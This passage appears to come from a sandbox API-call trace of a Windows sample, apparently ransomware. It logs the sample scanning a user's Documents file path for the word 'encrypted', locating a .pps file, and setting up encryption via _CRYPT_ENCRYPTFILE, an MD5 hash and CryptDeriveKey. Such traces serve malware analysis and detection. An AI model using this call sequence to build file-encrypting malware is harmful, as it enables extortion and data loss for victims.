lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.797] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.798] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0 IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IGSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GSxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SxNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xNnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NnE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nE4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wY28.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.799] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.799] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.799] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.799] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.799] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.799] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.799] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.799] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.799] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.799] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\6v0 IGSxNnE4wY28.pps", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ea7870, ftCreationTime.dwHighDateTime=0x1d5b8f7, ftLastAccessTime.dwLowDateTime=0xeae0d5a0, ftLastAccessTime.dwHighDateTime=0x1d5c152, ftLastWriteTime.dwLowDateTime=0xeae0d5a0, ftLastWriteTime.dwHighDateTime=0x1d5c152, nFileSizeHigh=0x0, nFileSizeLow=0x18da3, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="6v0 IGSxNnE4wY28.pps", cAlternateFileName="6V0IGS~1.PPS")) returned 0x7c2240 [0033.799] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.800] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.800] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.800] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.800] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.800] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.800] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.800] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.800] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.800] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.800] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.800] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.800] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.800] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.800] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.800] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.800] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.800] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.801] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.801] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.801] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.801] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.801] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.801] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.801] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.801] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.801] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.802] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.802] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.802] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.802] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.802] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.802] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.802] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.802] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.802] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.802] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.802] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.802] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.803] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.803] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.803] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.803] CryptHashData (hHash=0x7c2100, pbData=0x7c77a8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.803] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.803] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.803] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.803] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0033.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.804] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 